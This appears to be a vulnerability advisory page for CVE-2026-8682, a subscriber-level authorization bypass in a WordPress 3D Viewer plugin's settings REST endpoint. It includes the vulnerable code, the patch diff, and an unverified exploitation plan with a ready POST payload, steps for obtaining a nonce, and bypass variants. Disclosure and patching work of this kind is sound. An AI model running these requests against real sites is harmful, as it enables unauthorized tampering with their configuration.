CVE-2026-8682

3D Viewer <= 2.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Settings Modification via settings REST endpoint

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
2.0.2
Patched in
1d
Time to patch

Description

The 3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify all plugin settings by writing arbitrary data to the ar_try_on_settings option in the database via the /wp-json/ar_try_on/v1/settings REST endpoint.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.0.1
PublishedMay 27, 2026
Last updatedMay 28, 2026
Affected pluginar-vr-3d-model-try-on

What Changed in the Fix

Changes introduced in v2.0.2

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan outlines the steps required to analyze and exploit CVE-2026-8682, a missing authorization vulnerability in the **3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On** plugin for WordPress. ## 1. Vulnerability Summary The vulnerability exists in the REST API handler f…

Show full research plan

This research plan outlines the steps required to analyze and exploit CVE-2026-8682, a missing authorization vulnerability in the 3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On plugin for WordPress.

1. Vulnerability Summary

The vulnerability exists in the REST API handler for the /wp-json/ar_try_on/v1/settings endpoint. The plugin registers this route with a permission_callback named get_route_access, which fails to properly verify that the authenticated user possesses the manage_options capability. Consequently, any authenticated user, including those with Subscriber level permissions, can send a POST request to this endpoint to overwrite the ar_try_on_settings option in the WordPress database with arbitrary data.

2. Attack Vector Analysis

  • Endpoint: /wp-json/ar_try_on/v1/settings
  • HTTP Method: POST
  • Vulnerable Parameter: fields (Expected to be a JSON-encoded string).
  • Authentication: Required (Subscriber or higher).
  • Preconditions: The attacker must be authenticated and obtain a valid WordPress REST API nonce (_wpnonce).

3. Code Flow

The vulnerability is located in api/AR_TRY_ON_Api_Routes.php.

  1. Route Registration: The constructor calls ATLAS_AR_register_routes(), which uses register_rest_route to define the /settings endpoint.
    register_rest_route(
        $this->namespace, // 'ar_try_on/v1'
        '/settings',
        array(
            array(
                'methods' => \WP_REST_Server::ALLMETHODS,
                'callback' => array($this, 'settings'),
                'permission_callback' => array($this, 'get_route_access'), // Vulnerable check
                'args' => array(),
            ),
        )
    );
    
  2. Authorization Check: The permission_callback is mapped to get_route_access. While the source code for this specific function is truncated in the provided snippet, the vulnerability report confirms it permits Subscriber-level access.
  3. Data Processing: When a POST request is received, the settings() method is executed:
    public function settings($request)
    {
        $response['status'] = true;
        if ('post' == $request['method']) {
            // Decodes the 'fields' parameter from the request
            $fields = json_decode($request['fields'], true);
            // DIRECT SINK: Updates the plugin settings option with user-provided data
            update_option('ar_try_on_settings', $fields);
            
            // ... cache clearing logic ...
            return rest_ensure_response($response);
        }
        // ...
    }
    

4. Nonce Acquisition Strategy

To interact with the WordPress REST API as an authenticated user, a _wpnonce is typically required.

  1. Authentication: Log in to the WordPress site as a Subscriber.
  2. Retrieval via Browser: Navigate to any admin page (e.g., /wp-admin/profile.php).
  3. Execution: Use browser_eval to extract the global WordPress API settings nonce.
    • JS Variable: window.wpApiSettings.nonce
  4. Alternative: Check if the plugin localizes its own nonce. The UI script admin/js/build/ar-try-on-dashboard-ui.min.js likely consumes this API. If a specific nonce is used in the permission_callback, it may be found in a localized object (though standard REST routes usually rely on the default wp_rest nonce).

5. Exploitation Strategy

The goal is to modify the ar_try_on_settings option to demonstrate arbitrary data injection.

Step 1: Authentication

Authenticate as a Subscriber and capture the session cookies.

Step 2: Obtain REST Nonce

Navigate to /wp-admin/profile.php and run:
nonce = browser_eval("window.wpApiSettings.nonce")

Step 3: Send Malicious Request

Send a POST request to the settings endpoint.

  • URL: http://[target]/wp-json/ar_try_on/v1/settings
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
    • X-WP-Nonce: [obtained_nonce]
  • Body:
    method=post&fields={"pwned_by":"security_researcher","ar_try_on_allowed_post_types":["post","page","attachment"]}&has_value_changed=true
    
    Note: The method=post parameter is required because the plugin checks $request['method'] explicitly in the settings() function.

6. Test Data Setup

  1. Install and activate the plugin "3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On" (version 2.0.1).
  2. Create a user with the Subscriber role.
  3. (Optional) Note the existing settings via WP-CLI: wp option get ar_try_on_settings.

7. Expected Results

  • The server should return a 200 OK status code.
  • The JSON response should contain {"status":true,"data":{...}} echoing the injected fields.
  • The database option ar_try_on_settings will now contain the attacker-supplied JSON structure.

8. Verification Steps

After the exploit attempt, verify the database state using WP-CLI:

wp option get ar_try_on_settings --format=json

Check if the key "pwned_by" exists and matches "security_researcher".

9. Alternative Approaches

If the POST method is blocked or requires a different structure:

  1. JSON Body: Try sending the payload as a raw JSON body with Content-Type: application/json.
  2. Query Parameter: Try passing fields as a GET parameter if the server allows ALLMETHODS for the POST callback logic (though the code explicitly checks $request['method']).
  3. Method Spoofing: Use X-HTTP-Method-Override: POST if the server is configured to restrict standard POST requests.
Research Findings
Static analysis — not yet PoC-verified

Summary

The 3D Viewer plugin for WordPress fails to implement proper authorization checks on its REST API settings endpoint. Authenticated users with subscriber-level permissions can send a POST request to overwrite the plugin's configuration option ('ar_try_on_settings') in the database with arbitrary data.

Vulnerable Code

// api/AR_TRY_ON_Api_Routes.php lines 42-53
register_rest_route(
    $this->namespace,
    '/settings',
    array(
        array(
            'methods' => \WP_REST_Server::ALLMETHODS,
            'callback' => array($this, 'settings'),
            'permission_callback' => array($this, 'get_route_access'),
            'args' => array(),
        ),
    )
);

---

// api/AR_TRY_ON_Api_Routes.php lines 102-110
public function settings($request)
{
    $response['status'] = true;
    // save data about recording.
    if ('post' == $request['method']) {
        $fields = json_decode($request['fields'], true);
        update_option('ar_try_on_settings', $fields);
        AR_TRY_ON_Cache::delete('settings');

Security Fix

--- api/AR_TRY_ON_Api_Routes.php
+++ api/AR_TRY_ON_Api_Routes.php
@@ -130,1 +130,5 @@
-    public function get_route_access()
+    public function get_route_access($request)
     {
-        return true;
+        return current_user_can('manage_options');
     }

Exploit Outline

To exploit this vulnerability, an attacker follows these steps: 1. Authenticate to the WordPress site as a user with Subscriber-level permissions or higher. 2. Obtain a valid WordPress REST API nonce from any admin dashboard page (e.g., via window.wpApiSettings.nonce). 3. Construct a POST request to the endpoint `/wp-json/ar_try_on/v1/settings`. 4. Include a body parameter named 'method' with the value 'post'. 5. Include a body parameter named 'fields' containing a JSON-encoded string of the desired plugin settings. 6. Upon execution, the `settings()` callback decodes the 'fields' JSON and passes it directly to `update_option()`, effectively allowing the attacker to control the plugin's behavior or inject data.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.